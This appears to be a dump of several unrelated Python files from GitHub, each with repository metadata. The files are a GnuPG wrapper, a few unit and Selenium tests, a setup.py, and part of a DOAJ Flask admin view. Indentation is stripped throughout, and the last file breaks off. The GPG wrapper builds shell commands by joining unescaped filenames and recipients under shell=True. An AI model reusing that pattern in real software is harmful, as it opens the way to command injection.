Richard Jones
Neil McNab
We are not using it, but the most current code appears to be at: https://pythonhosted.org/python-gnupg/
"""
__rcsid__ = "$Id: GPG.py,v 1.3 2003/11/23 15:03:15 akuchling Exp $"
import sys
if sys.version_info < (3,):
import StringIO
else:
import io as StringIO
import base64
import gettext
import locale
import os
import os.path
import subprocess
try:
import win32process
except ImportError:
pass
def translate():
"""
Setup translation path
"""
if __name__ == "__main__":
try:
base = os.path.basename(__file__)[:-3]
localedir = os.path.join(os.path.dirname(__file__), "locale")
except NameError:
base = os.path.basename(sys.executable)[:-4]
localedir = os.path.join(os.path.dirname(sys.executable), "locale")
else:
temp = __name__.split(".")
base = temp[-1]
localedir = os.path.join("/".join(["%s" % k for k in temp[:-1]]), "locale")
# print base, localedir, locale.getdefaultlocale()
localelang = locale.getdefaultlocale()[0]
if localelang == None:
localelang = "LC_ALL"
t = gettext.translation(base, localedir, [localelang], None, "en")
try:
return t.ugettext
# python3
except:
return t.gettext
_ = translate()
# Default path used for searching for the GPG binary
DEFAULT_PATH = [
"/bin",
"/usr/bin",
"/usr/local/bin",
"${PROGRAMFILES}\\GNU\\GnuPG",
"${PROGRAMFILES(X86)}\\GNU\\GnuPG",
"GPG",
"${SYSTEMDRIVE}\\cygwin\\bin",
"${SYSTEMDRIVE}\\cygwin\\usr\\bin",
"${SYSTEMDRIVE}\\cygwin\\usr\\local\\bin",
]
class Signature:
"""
Used to hold information about a signature result
"""
def __init__(self):
self.valid = 0
self.fingerprint = self.creation_date = self.timestamp = None
self.signature_id = self.key_id = None
self.username = None
self.error = None
self.nopubkey = False
def NEWSIG(self, value):
pass
def BADSIG(self, value):
self.error = "BADSIG"
self.valid = 0
self.key_id, self.username = value.split(None, 1)
def GOODSIG(self, value):
self.valid = 1
# self.error = "GOODSIG"
self.key_id, self.username = value.split(None, 1)
def VALIDSIG(self, value):
# print value
# self.valid = 1
# self.error = "VALID_SIG"
self.fingerprint, self.creation_date, self.timestamp, other = value.split(
" ", 3
)
def SIG_ID(self, value):
# self.error = "SIG_ID"
self.signature_id, self.creation_date, self.timestamp = value.split(" ", 2)
def NODATA(self, value):
self.error = _("File not properly loaded for signature.")
def ERRSIG(self, value):
# print value
self.error = _("Signature error.")
def NO_PUBKEY(self, value):
self.key_id = value
self.nopubkey = True
self.error = _("Signature error, missing public key with id 0x%s.") % value[-8:]
def KEYEXPIRED(self, value):
self.error = _("Signature error, signing key expired at %s.") % value
def SIGEXPIRED(self, value):
return self.KEYEXPIRED(value)
def EXPKEYSIG(self, value):
# value is the name of the expired key
self.error = _("Signature error, valid but key expired, %s") % value
def TRUST_ULTIMATE(self, value):
"""
see http://cvs.gnupg.org/cgi-bin/viewcvs.cgi/trunk/doc/DETAILS?rev=289
Trust settings do NOT determine if a signature is good or not! That is reserved for GOOD_SIG!
"""
return
def TRUST_UNDEFINED(self, value):
self.error = _("Trust undefined")
# print value.split()
# raise AssertionError, "File not properly loaded for signature."
def is_valid(self):
"""
returns boolean result of signature valididity
"""
return self.valid
class ImportResult:
"""
Used to hold information about a key import result
"""
counts = """count no_user_id imported imported_rsa unchanged
n_uids n_subk n_sigs n_revoc sec_read sec_imported
sec_dups not_imported""".split()
def __init__(self):
self.imported = []
self.results = []
for result in self.counts:
setattr(self, result, None)
def NODATA(self, value):
self.results.append(
{"fingerprint": None, "problem": "0", "text": "No valid data found"}
)
def IMPORTED(self, value):
# this duplicates info we already see in import_ok and import_problem
pass
ok_reason = {
"0": "Not actually changed",
"1": "Entirely new key",
"2": "New user IDs",
"4": "New signatures",
"8": "New subkeys",
"16": "Contains private key",
}
def IMPORT_OK(self, value):
reason, fingerprint = value.split()
self.results.append(
{"fingerprint": fingerprint, "ok": reason, "text": self.ok_reason[reason]}
)
problem_reason = {
"0": "No specific reason given",
"1": "Invalid Certificate",
"2": "Issuer Certificate missing",
"3": "Certificate Chain too long",
"4": "Error storing certificate",
}
def IMPORT_PROBLEM(self, value):
try:
reason, fingerprint = value.split()
except:
reason = value
fingerprint = "<unknown>"
self.results.append(
{
"fingerprint": fingerprint,
"problem": reason,
"text": self.problem_reason[reason],
}
)
def IMPORT_RES(self, value):
import_res = value.split()
for i in range(len(self.counts)):
setattr(self, self.counts[i], int(import_res[i]))
def KEYEXPIRED(self, value):
self.error = _("Signature error, signing key expired at %s.") % value
def SIGEXPIRED(self, value):
self.error = _("Signature error, signature expired at %s.") % value
def summary(self):
l = []
l.append("%d imported" % self.imported)
if self.not_imported:
l.append("%d not imported" % self.not_imported)
return ", ".join(l)
class ListResult:
"""Parse a --list-keys output
Handle pub and uid (relating the latter to the former).
Don't care about (info from src/DETAILS):
crt = X.509 certificate
crs = X.509 certificate and private key available
sub = subkey (secondary key)
sec = secret key
ssb = secret subkey (secondary key)
uat = user attribute (same as user id except for field 10).
sig = signature
rev = revocation signature
fpr = fingerprint: (fingerprint is in field 10)
pkd = public key data (special field format, see below)
grp = reserved for gpgsm
rvk = revocation key
"""
def __init__(self):
self.pub_keys = []
self.pk = None
def pub(self, args):
keyid = args[4]
date = args[5]
uid = args[9]
self.pk = {"keyid": keyid, "date": date, "uids": [uid]}
self.pub_keys.append(self.pk)
def uid(self, args):
self.pk["uids"].append(args[9])
class EncryptedMessage:
"""Handle a --encrypt command"""
def __init__(self):
self.data = ""
def BEGIN_ENCRYPTION(self, value):
pass
def END_ENCRYPTION(self, value):
pass
class GPGSubprocess:
def __init__(self, gpg_binary=None, keyring=None):
"""Initialize an object instance. Options are:
gpg_binary -- full pathname for GPG binary. If not supplied,
the current value of PATH will be searched, falling back to the
DEFAULT_PATH class variable if PATH isn't available.
keyring -- full pathname to the public keyring to use in place of
the default "~/.gnupg/pubring.gpg".
"""
# If needed, look for the gpg binary along the path
if gpg_binary is None or gpg_binary == "":
path = DEFAULT_PATH
if "PATH" in os.environ:
temppath = os.environ["PATH"]
path.extend(temppath.split(os.pathsep))
# else:
# path = self.DEFAULT_PATH
for pathdir in path:
pathdir = os.path.expandvars(pathdir)
fullname = os.path.join(pathdir, "gpg")
if self._check_file(fullname):
gpg_binary = fullname
break
if self._check_file(fullname + ".exe"):
gpg_binary = fullname + ".exe"
break
# gpg2 support
fullname += "2"
if self._check_file(fullname):
gpg_binary = fullname
break
if self._check_file(fullname + ".exe"):
gpg_binary = fullname + ".exe"
break
else:
raise ValueError(
_("Couldn't find 'gpg' binary on path %s.") % repr(path)
)
self.gpg_binary = '"' + gpg_binary + '"'
self.keyring = keyring
def _check_file(self, filename):
if os.path.isfile(filename) and os.access(filename, os.X_OK):
return True
return False
def _open_subprocess(self, *args):
"""
Internal method: open a pipe to a GPG subprocess and return
the file objects for communicating with it.
"""
cmd = [self.gpg_binary, "--status-fd 2"]
if self.keyring:
cmd.append('--keyring "%s" --no-default-keyring' % self.keyring)
cmd.extend(args)
cmd = " ".join(cmd)
# print cmd
shell = True
if os.name == "nt":
shell = False
# From: http://www.py2exe.org/index.cgi/Py2ExeSubprocessInteractions
creationflags = 0
try:
creationflags = win32process.CREATE_NO_WINDOW
except NameError:
pass
process = subprocess.Popen(
cmd,
shell=shell,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
creationflags=creationflags,
)
# child_stdout, child_stdin, child_stderr = #popen2.popen3(cmd)
# return child_stdout, child_stdin, child_stderr
# print process.stderr
return process.stdout, process.stdin, process.stderr
def _read_response(self, child_stdout, response):
"""
Internal method: reads all the output from GPG, taking notice
only of lines that begin with the magic [GNUPG:] prefix.
Calls methods on the response object for each valid token found,
with the arg being the remainder of the status line.
"""
while 1:
line = child_stdout.readline()
# print line
if line == "":
break
line = line.rstrip()
if line[0:9] == "[GNUPG:] ":
# Chop off the prefix
line = line[9:]
L = line.split(None, 1)
keyword = L[0]
if len(L) > 1:
value = L[1]
else:
value = ""
getattr(response, keyword)(value)
def _handle_gigo(self, args, file, result):
"""
Handle a basic data call - pass data to GPG, handle the output
including status information. Garbage In, Garbage Out :)
"""
child_stdout, child_stdin, child_stderr = self._open_subprocess(*args)
# Copy the file to the GPG subprocess
while 1:
data = file.read(1024)
if data == "":
break
child_stdin.write(data)
child_stdin.close()
# Get the response information
self._read_response(child_stderr, result)
# Read the contents of the file from GPG's stdout
result.data = ""
while 1:
data = child_stdout.read(1024)
if data == "":
break
result.data = result.data + data
return result
#
# SIGNATURE VERIFICATION METHODS
#
def verify(self, data):
"""
Verify the signature on the contents of the string 'data'
"""
fileobj = StringIO.StringIO(data)
return self.verify_file(fileobj)
def verify_file(self, file):
"""
Verify the signature on the contents of the file-like object 'file'
"""
sig = Signature()
self._handle_gigo(["--verify -"], file, sig)
return sig
def verify_file_detached(self, filename, sigtext):
"""
filename - local name of file to check signature for
sigtext - text of the PGP signature
"""
sig = Signature()
sigfile = StringIO.StringIO(sigtext)
self._handle_gigo(['--verify - "%s"' % filename], sigfile, sig)
return sig
#
# KEY MANAGEMENT
#
def import_key(self, key_data):
"""import the key_data into our keyring"""
child_stdout, child_stdin, child_stderr = self._open_subprocess("--import")
child_stdin.write(key_data)
child_stdin.close()
# Get the response information
result = ImportResult()
self._read_response(child_stderr, result)
return result
def list_keys(self):
"""list the keys currently in the keyring"""
child_stdout, child_stdin, child_stderr = self._open_subprocess(
"--list-keys --with-colons"
)
child_stdin.close()
# TODO: there might be some status thingumy here I should handle...
# Get the response information
result = ListResult()
valid_keywords = "pub uid".split()
while 1:
line = child_stdout.readline()
if not line:
break
L = line.strip().split(":")
if not L:
continue
keyword = L[0]
if keyword in valid_keywords:
getattr(result, keyword)(L)
return result
#
# ENCRYPTING DATA
#
def encrypt_file(self, file, recipients):
'''Encrypt the message read from the file-like object "file"'''
args = ["--encrypt --armor"]
for recipient in recipients:
args.append("--recipient %s" % recipient)
result = EncryptedMessage()
self._handle_gigo(args, file, result)
return result
def encrypt(self, data, recipients):
'''Encrypt the message contained in the string "data"'''
fileobj = StringIO.StringIO(data)
return self.encrypt_file(fileobj, recipients)
# Not yet implemented, because I don't need these methods
# The methods certainly don't have all the parameters they'd need.
def sign(self, data):
'''Sign the contents of the string "data"'''
pass
def sign_file(self, file):
'''Sign the contents of the file-like object "file"'''
pass
def decrypt_file(self, file):
'''Decrypt the message read from the file-like object "file"'''
pass
def decrypt(self, data):
'''Decrypt the message contained in the string "data"'''
pass
def print_hex(binary_data):
"""
takes a binary string as input, prints it as hex bytes
"""
for byte in binary_data:
print(
"%.2x" % ord(byte),
)
def decode(filename):
"""
Decodes data elements from a given PGP file name.
"""
if filename == None:
return []
if filename.endswith(".asc"):
return decode_asc(filename)
else:
return decode_sig(filename)
def decode_sig(filename):
"""
Decodes data elements from a binary (.sig) PGP file.
"""
filehandle = open(filename)
binstr = filehandle.read()
filehandle.close()
return decode_data(binstr)
def decode_asc(filename):
"""
Decodes data elements from a base 64 encoded (.asc) PGP file.
"""
filehandle = open(filename)
lines = filehandle.readlines()
filehandle.close()
return decode_lines(lines)
def decode_lines(lines):
"""
Decodes header from PGP ASCII.
"""
text = ""
add = False
for line in lines:
if line.strip().startswith("-----END PGP "):
add = False
if add and line.strip() != "":
text += line
# if line.strip().startswith("-----BEGIN PGP SIGNATURE-----"):
if line.strip() == "":
add = True
binary_data = base64.standard_b64decode(text)
return decode_data(binary_data)
def decode_data(binary_data):
"""
Decodes data packets from a PGP formatted string.
"""
pktlist = GPGFile()
while len(binary_data) > 3:
packet = decode_header(binary_data)
pktlist.append(packet)
binary_data = binary_data[packet["size"] + packet["header_size"] :]
# print len(binary_data)
return pktlist
def decode_header(binary_data):
"""
Decodes the header of a PGP formatted string.
"""
results = {}
packet_header = ord(binary_data[0])
binary_data = binary_data[1:]
format = (packet_header & 0x40) >> 6
if format == 1:
# new format packet
# print "not implemented, new packet format"
results["content_tag"] = packet_header & 0x1F
results["format"] = "New"
# print "new", len(binary_data)
# results['header_size'] = 0
octet1 = ord(binary_data[0])
if octet1 < 192:
results["size"] = ord(binary_data[0])
binary_data = binary_data[1:]
elif 192 <= octet1 <= 223:
results["size"] = ((ord(binary_data[0]) - 192) << 8) + ord(binary_data[1])
binary_data = binary_data[2:]
elif octet1 == 255:
results["size"] = (
(ord(binary_data[0]) << 24)
| (ord(binary_data[1]) << 16)
| (ord(binary_data[2])) << 8
| ord(binary_data[3])
)
binary_data = binary_data[4:]
else:
print("not implemented, header length", octet1)
return results
else:
# old format
results["format"] = "Old"
results["content_tag"] = (packet_header >> 2) & 0x0F
length_type = packet_header & 0x03
# print length_type
if length_type < 3:
length_octets = pow(2, length_type)
results["header_size"] = length_octets + 1
# print length_octets
if length_octets == 1:
results["size"] = ord(binary_data[0])
binary_data = binary_data[1:]
elif length_octets == 2:
results["size"] = (ord(binary_data[0]) << 8) + ord(binary_data[1])
binary_data = binary_data[2:]
elif length_octets == 4:
results["size"] = (
(ord(binary_data[0]) << 24)
+ (ord(binary_data[1]) << 16)
+ (ord(binary_data[2]) << 8)
+ ord(binary_data[3])
)
binary_data = binary_data[4:]
else:
print("not implemented, header length", length_octets)
return results
elif length_type == 3:
print("not implemented, length type", length_type)
return results
return decode_tag(results, binary_data[: results["size"]])
def decode_tag(results, binary_data):
"""
Decodes packet types from a PGP string.
"""
if results["content_tag"] == 2:
# signature packet
results["type"] = "Signature Packet"
sig_version = ord(binary_data[0])
if sig_version == 3:
mat_length = ord(binary_data[1])
sig_type = ord(binary_data[2])
print("sig type:", sig_type)
create_time = binary_data[3:7]
print("create time:", print_hex(create_time))
key_id = binary_data[7:15]
print("key id:", print_hex(key_id))
key_algo = ord(binary_data[15])
hash_algo = ord(binary_data[16])
print("key algo: %x" % key_algo)
print("hash algo: %x" % hash_algo)
signed_hash = binary_data[17:19]
print("sig start:", print_hex(signed_hash))
signature = binary_data[19:]
# print len(signature)
r = signature[:20]
s = signature[20:]
print("r:", print_hex(signature[:20]))
print("s:", print_hex(signature[20:]))
elif results["content_tag"] == 6:
results["type"] = "Public Key Packet"
results["key.version"] = ord(binary_data[0])
if results["key.version"] == 4:
create_time = binary_data[1:5]
# print "create time:", print_hex(create_time)
# days = binary_data[5:7]
# print "valid days:", (ord(days[0]) << 8) + ord(days[1])
results["key.algo"] = ord(binary_data[5])
elif results["key.version"] == 3:
# create_time = binary_data[1:5]
# print "create time:", print_hex(create_time)
# days = binary_data[5:7]
# print "valid days:", (ord(days[0]) << 8) + ord(days[1])
# results["key.algo"] = ord(binary_data[6])
print("not implemented, key version", results["key.version"])
else:
print("not implemented, key version", results["key.version"])
elif results["content_tag"] == 13:
results["type"] = "User ID"
user = ""
for char in binary_data:
user += chr(ord(char))
results["user.value"] = user
else:
pass
# print "not yet implemented, tag", results['content_tag']
return results
# print "\nAll data:", print_hex(binary_data)
class GPGFile(list):
"""
Class to manager PGP packet data.
"""
def __init__(self, filename=None, url=None):
self.url = url
self.filename = filename
self.extend(decode(self.filename))
def get_user_ids(self):
"""
Returns a list of the display names for keys.
"""
idlist = []
for item in self:
if item["content_tag"] == 13:
idlist.append(item["user.value"])
return idlist
##def binary2int(bin):
## i = 0
## total = 0
## for j in range(len(bin)):
## total += ord(bin[j]) * pow(2,i)
## i += 8
## return total
# if __name__=="__main__":
# for item in decode_asc("mcnab.asc"):
# print item
# print get_user_id("mcnab.asc")
##
if __name__ == "__main__":
## import sys
## if len(sys.argv) == 1:
## print 'Usage: GPG.py <signed file>'
## sys.exit()
##
obj = GPGSubprocess()
## file = open(sys.argv[1], 'rb')
## sig = obj.verify_file( file )
## print sig.__dict__
| {
"content_hash": "7e82ff79176bbbee70c0f0eae27ca893",
"timestamp": "",
"source": "github",
"line_count": 818,
"max_line_length": 103,
"avg_line_length": 29.586797066014668,
"alnum_prop": 0.54640112387406,
"repo_name": "metalink-dev/pymetalink",
"id": "1623d1003b090bf095345d20f6d9ea5fbc6d424c",
"size": "24226",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "metalink/GPG.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "745"
},
{
"name": "HTML",
"bytes": "282"
},
{
"name": "Python",
"bytes": "200635"
},
{
"name": "Shell",
"bytes": "81"
}
],
"symlink_target": ""
} |
import mock
from cloudferry.lib.os.compute import instances
from tests import test
class LiveMigrationTestCase(test.TestCase):
def test_raises_error_for_unknown_migration_tool(self):
nova_client = mock.Mock()
config = mock.Mock()
config.migrate.incloud_live_migration = "not-existing-migration-type"
vm_id = "some-id"
dest_host = "some-host"
self.assertRaises(NotImplementedError,
instances.incloud_live_migrate,
nova_client, config, vm_id, dest_host)
def test_runs_migration_for_nova(self):
nova_client = mock.Mock()
config = mock.Mock()
config.migrate.incloud_live_migration = "nova"
vm_id = "some-id"
dest_host = "dest-host"
instances.incloud_live_migrate(nova_client, config, vm_id, dest_host)
@mock.patch('cloudferry.lib.os.compute.instances.run', mock.MagicMock())
@mock.patch('cloudferry.lib.os.compute.instances.clients',
mock.MagicMock())
def test_runs_migration_for_cobalt(self):
nova_client = mock.Mock()
config = mock.Mock()
config.migrate.incloud_live_migration = "cobalt"
vm_id = "some-id"
dest_host = "dest-host"
instances.incloud_live_migrate(nova_client, config, vm_id, dest_host)
| {
"content_hash": "e88d4a0eeabb9677038cfc30c259f9b2",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 77,
"avg_line_length": 33.5,
"alnum_prop": 0.6268656716417911,
"repo_name": "SVilgelm/CloudFerry",
"id": "1038a57ed4ff786b84f2ade16af7487540f127f8",
"size": "1916",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/lib/os/compute/test_live_migration.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "2615"
},
{
"name": "Python",
"bytes": "1718937"
},
{
"name": "Ruby",
"bytes": "2507"
},
{
"name": "Shell",
"bytes": "11910"
}
],
"symlink_target": ""
} |
from selenium import webdriver
from selenium.webdriver.common.by import By
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.support.ui import Select
from selenium.common.exceptions import NoSuchElementException
from selenium.common.exceptions import NoAlertPresentException
import unittest, time, re
class Search(unittest.TestCase):
def setUp(self):
self.driver = webdriver.Firefox()
self.driver.implicitly_wait(30)
self.base_url = "http://localhost:8081/"
self.verificationErrors = []
self.accept_next_alert = True
def test_search(self):
driver = self.driver
driver.get(self.base_url + "/php4dvd/")
driver.find_element_by_id("q").clear()
driver.find_element_by_id("q").send_keys("my film")
# Warning: verifyTextPresent may require manual changes
try: self.assertRegexpMatches(driver.find_element_by_css_selector("BODY").text, r"^[\s\S]*$")
except AssertionError as e: self.verificationErrors.append(str(e))
driver.find_element_by_id("q").clear()
driver.find_element_by_id("q").send_keys("jksgkdvlm")
# Warning: verifyTextPresent may require manual changes
try: self.assertRegexpMatches(driver.find_element_by_css_selector("BODY").text, r"^[\s\S]*$")
except AssertionError as e: self.verificationErrors.append(str(e))
def is_element_present(self, how, what):
try: self.driver.find_element(by=how, value=what)
except NoSuchElementException, e: return False
return True
def is_alert_present(self):
try: self.driver.switch_to_alert()
except NoAlertPresentException, e: return False
return True
def close_alert_and_get_its_text(self):
try:
alert = self.driver.switch_to_alert()
alert_text = alert.text
if self.accept_next_alert:
alert.accept()
else:
alert.dismiss()
return alert_text
finally: self.accept_next_alert = True
def tearDown(self):
self.driver.quit()
self.assertEqual([], self.verificationErrors)
if __name__ == "__main__":
unittest.main()
| {
"content_hash": "0a3c3a03b6f762f2de619aefbb008a7a",
"timestamp": "",
"source": "github",
"line_count": 57,
"max_line_length": 101,
"avg_line_length": 39.175438596491226,
"alnum_prop": 0.6480071652485445,
"repo_name": "iri6e4ka/test-project",
"id": "139615fa7e5222848067590d01bf3f51609974fd",
"size": "2257",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "php4dvd/search.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "5713"
}
],
"symlink_target": ""
} |
import os
from setuptools import find_packages
from setuptools import setup
HERE = os.path.abspath(os.path.dirname(__file__))
README = open(os.path.join(HERE, 'README.rst')).read()
CHANGES = open(os.path.join(HERE, 'CHANGES.rst')).read()
REQUIRES = ('cryptacular',
'docutils',
'dogpile.cache',
'pyramid',
'pyramid_tm',
'sqlalchemy',
'wtforms',
'zope.sqlalchemy')
setup(name='Yait',
version='0.1.0',
description='Yait is an issue tracker.',
long_description='\n\n'.join((README, CHANGES)),
classifiers=(
'Development Status :: 3 - Alpha',
'Environment :: Web Environment',
'Framework :: Pyramid',
'License :: OSI Approved :: BSD License',
'Natural Language :: English',
'Programming Language :: Python',
'Programming Language :: Python :: 2.7',
'Topic :: Internet :: WWW/HTTP :: WSGI :: Application',
'Topic :: Software Development :: Bug Tracking'
),
author='Damien Baty',
author_email='[email protected]',
url='FIXME',
keywords='web bug issue tracker pyramid',
packages=find_packages(),
include_package_data=True,
zip_safe=False,
install_requires=REQUIRES,
test_suite='yait.tests',
entry_points='''\
[paste.app_factory]
main = yait.app:make_app
''')
| {
"content_hash": "22c05ceb530c986756b861ca89030eda",
"timestamp": "",
"source": "github",
"line_count": 49,
"max_line_length": 63,
"avg_line_length": 29.285714285714285,
"alnum_prop": 0.5763066202090592,
"repo_name": "dbaty/Yait",
"id": "e45e56e4bef5238dc71c504c0b4131d9383eb921",
"size": "1435",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "JavaScript",
"bytes": "148835"
},
{
"name": "Python",
"bytes": "162796"
}
],
"symlink_target": ""
} |
import pytest
import unittest
from modules.sfp_focsec import sfp_focsec
from sflib import SpiderFoot
from spiderfoot import SpiderFootEvent, SpiderFootTarget
@pytest.mark.usefixtures
class TestModuleIntegrationFocsec(unittest.TestCase):
@unittest.skip("todo")
def test_handleEvent(self):
sf = SpiderFoot(self.default_options)
module = sfp_focsec()
module.setup(sf, dict())
target_value = 'example target value'
target_type = 'IP_ADDRESS'
target = SpiderFootTarget(target_value, target_type)
module.setTarget(target)
event_type = 'ROOT'
event_data = 'example data'
event_module = ''
source_event = ''
evt = SpiderFootEvent(event_type, event_data, event_module, source_event)
result = module.handleEvent(evt)
self.assertIsNone(result)
| {
"content_hash": "2fdcf038359feb97dbcbb91d4ae49457",
"timestamp": "",
"source": "github",
"line_count": 32,
"max_line_length": 81,
"avg_line_length": 26.9375,
"alnum_prop": 0.6716937354988399,
"repo_name": "smicallef/spiderfoot",
"id": "9b88950a510ce6610d59bead2df952eeae0f843b",
"size": "862",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test/integration/modules/test_sfp_focsec.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "9833"
},
{
"name": "Dockerfile",
"bytes": "2779"
},
{
"name": "JavaScript",
"bytes": "34248"
},
{
"name": "Python",
"bytes": "2845553"
},
{
"name": "RobotFramework",
"bytes": "7584"
},
{
"name": "Shell",
"bytes": "1636"
}
],
"symlink_target": ""
} |
import logging
logging.basicConfig(level=logging.INFO,
format='%(asctime)s %(levelname)s: %(message)s',
datefmt='%a, %d %b %Y %H:%M:%S',)
logger = logging.getLogger('scanner')
| {
"content_hash": "9f215884c383d59a7aa070f3b19e060e",
"timestamp": "",
"source": "github",
"line_count": 11,
"max_line_length": 68,
"avg_line_length": 20.181818181818183,
"alnum_prop": 0.5495495495495496,
"repo_name": "gogobirds/Pencil",
"id": "873b2582a50200eab45e61a86b9a0887cf2ff2b4",
"size": "305",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "libs/printer.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7487"
}
],
"symlink_target": ""
} |
import json
from flask import Blueprint, request, flash, abort, make_response
from flask import render_template, redirect, url_for
from flask_login import current_user, login_required
from werkzeug.datastructures import MultiDict
from portality import dao
import portality.models as models
from portality import constants
from portality import lock
from portality.background import BackgroundSummary
from portality.bll import DOAJ, exceptions
from portality.bll.exceptions import ArticleMergeConflict, DuplicateArticleException
from portality.core import app
from portality.crosswalks.application_form import ApplicationFormXWalk
from portality.decorators import ssl_required, restrict_to_role, write_required
from portality.forms.application_forms import ApplicationFormFactory, application_statuses
from portality.forms.application_forms import JournalFormFactory
from portality.forms.article_forms import ArticleFormFactory
from portality.lcc import lcc_jstree
from portality.lib.query_filters import remove_search_limits, update_request, not_update_request
from portality.tasks import journal_in_out_doaj, journal_bulk_edit, suggestion_bulk_edit, journal_bulk_delete, \
article_bulk_delete
from portality.ui.messages import Messages
from portality.util import flash_with_url, jsonp, make_json_resp, get_web_json_payload, validate_json
from portality.view.forms import EditorGroupForm, MakeContinuation
from portality.bll.services.query import Query
# ~~Admin:Blueprint~~
blueprint = Blueprint('admin', __name__)
# restrict everything in admin to logged in users with the "admin" role
@blueprint.before_request
def restrict():
return restrict_to_role('admin')
# build an admin page where things can be done
@blueprint.route('/')
@login_required
@ssl_required
def index():
return render_template('admin/index.html', admin_page=True)
@blueprint.route("/journals", methods=["GET"])
@login_required
@ssl_required
def journals():
qs = request.query_string
target = url_for("admin.index")
if qs:
target += "?" + qs.decode()
return redirect(target)
@blueprint.route("/journals", methods=["POST", "DELETE"])
@login_required
@ssl_required
@write_required()
@jsonp
def journals_list():
if request.method == "POST":
try:
query = json.loads(request.values.get("q"))
except:
app.logger.warn("Bad Request at admin/journals: " + str(request.values.get("q")))
abort(400)
# get the total number of journals to be affected
jtotal = models.Journal.hit_count(query, consistent_order=False)
# get the total number of articles to be affected
issns = models.Journal.issns_by_query(query)
atotal = models.Article.count_by_issns(issns)
resp = make_response(json.dumps({"journals" : jtotal, "articles" : atotal}))
resp.mimetype = "application/json"
return resp
elif request.method == "DELETE":
if not current_user.has_role("delete_article"):
abort(401)
try:
query = json.loads(request.data)
except:
app.logger.warn("Bad Request at admin/journals: " + str(request.data))
abort(400)
# get only the query part
query = {"query" : query.get("query")}
models.Journal.delete_selected(query=query, articles=True, snapshot_journals=True, snapshot_articles=True)
resp = make_response(json.dumps({"status" : "success"}))
resp.mimetype = "application/json"
return resp
@blueprint.route("/articles", methods=["POST", "DELETE"])
@login_required
@ssl_required
@write_required()
@jsonp
def articles_list():
if request.method == "POST":
try:
query = json.loads(request.values.get("q"))
except:
print(request.values.get("q"))
abort(400)
total = models.Article.hit_count(query, consistent_order=False)
resp = make_response(json.dumps({"total" : total}))
resp.mimetype = "application/json"
return resp
elif request.method == "DELETE":
if not current_user.has_role("delete_article"):
abort(401)
try:
query = json.loads(request.data)
except:
app.logger.warn("Bad Request at admin/journals: " + str(request.data))
abort(400)
# get only the query part
query = {"query" : query.get("query")}
models.Article.delete_selected(query=query, snapshot=True)
resp = make_response(json.dumps({"status" : "success"}))
resp.mimetype = "application/json"
return resp
@blueprint.route("/delete/article/<article_id>", methods=["POST"])
@login_required
@ssl_required
@write_required()
def article_endpoint(article_id):
if not current_user.has_role("delete_article"):
abort(401)
a = models.Article.pull(article_id)
if a is None:
abort(404)
delete = request.values.get("delete", "false")
if delete != "true":
abort(400)
a.snapshot()
a.delete()
# return a json response
resp = make_response(json.dumps({"success" : True}))
resp.mimetype = "application/json"
return resp
@blueprint.route("/article/<article_id>", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def article_page(article_id):
if not current_user.has_role("edit_article"):
abort(401)
ap = models.Article.pull(article_id)
if ap is None:
abort(404)
fc = ArticleFormFactory.get_from_context(role="admin", source=ap, user=current_user)
if request.method == "GET":
return fc.render_template()
elif request.method == "POST":
user = current_user._get_current_object()
fc = ArticleFormFactory.get_from_context(role="admin", source=ap, user=user, form_data=request.form)
fc.modify_authors_if_required(request.values)
if fc.validate():
try:
fc.finalise()
except ArticleMergeConflict:
Messages.flash(Messages.ARTICLE_METADATA_MERGE_CONFLICT)
except DuplicateArticleException:
Messages.flash(Messages.ARTICLE_METADATA_UPDATE_CONFLICT)
return fc.render_template()
@blueprint.route("/journal/<journal_id>", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def journal_page(journal_id):
# ~~JournalForm:Page~~
auth_svc = DOAJ.authorisationService()
journal_svc = DOAJ.journalService()
journal, _ = journal_svc.journal(journal_id)
if journal is None:
abort(404)
try:
auth_svc.can_edit_journal(current_user._get_current_object(), journal)
except exceptions.AuthoriseException:
abort(401)
# attempt to get a lock on the object
try:
lockinfo = lock.lock(constants.LOCK_JOURNAL, journal_id, current_user.id)
except lock.Locked as l:
return render_template("admin/journal_locked.html", journal=journal, lock=l.lock)
fc = JournalFormFactory.context("admin")
if request.method == "GET":
job = None
job_id = request.values.get("job")
if job_id is not None and job_id != "":
# ~~-> BackgroundJobs:Model~~
job = models.BackgroundJob.pull(job_id)
# ~~-> BackgroundJobs:Page~~
url = url_for("admin.background_jobs_search") + "?source=" + dao.Facetview2.url_encode_query(dao.Facetview2.make_query(job_id))
Messages.flash_with_url(Messages.ADMIN__WITHDRAW_REINSTATE.format(url=url), "success")
fc.processor(source=journal)
return fc.render_template(lock=lockinfo, job=job, obj=journal, lcc_tree=lcc_jstree)
elif request.method == "POST":
processor = fc.processor(formdata=request.form, source=journal)
if processor.validate():
try:
processor.finalise()
flash('Journal updated.', 'success')
for a in processor.alert:
flash_with_url(a, "success")
return redirect(url_for("admin.journal_page", journal_id=journal.id, _anchor='done'))
except Exception as e:
flash(str(e))
return redirect(url_for("admin.journal_page", journal_id=journal.id, _anchor='cannot_edit'))
else:
return fc.render_template(lock=lockinfo, obj=journal, lcc_tree=lcc_jstree)
######################################################
# Endpoints for reinstating/withdrawing journals from the DOAJ
#
@blueprint.route("/journal/<journal_id>/activate", methods=["GET", "POST"])
@login_required
@ssl_required
@write_required()
def journal_activate(journal_id):
job = journal_in_out_doaj.change_in_doaj([journal_id], True)
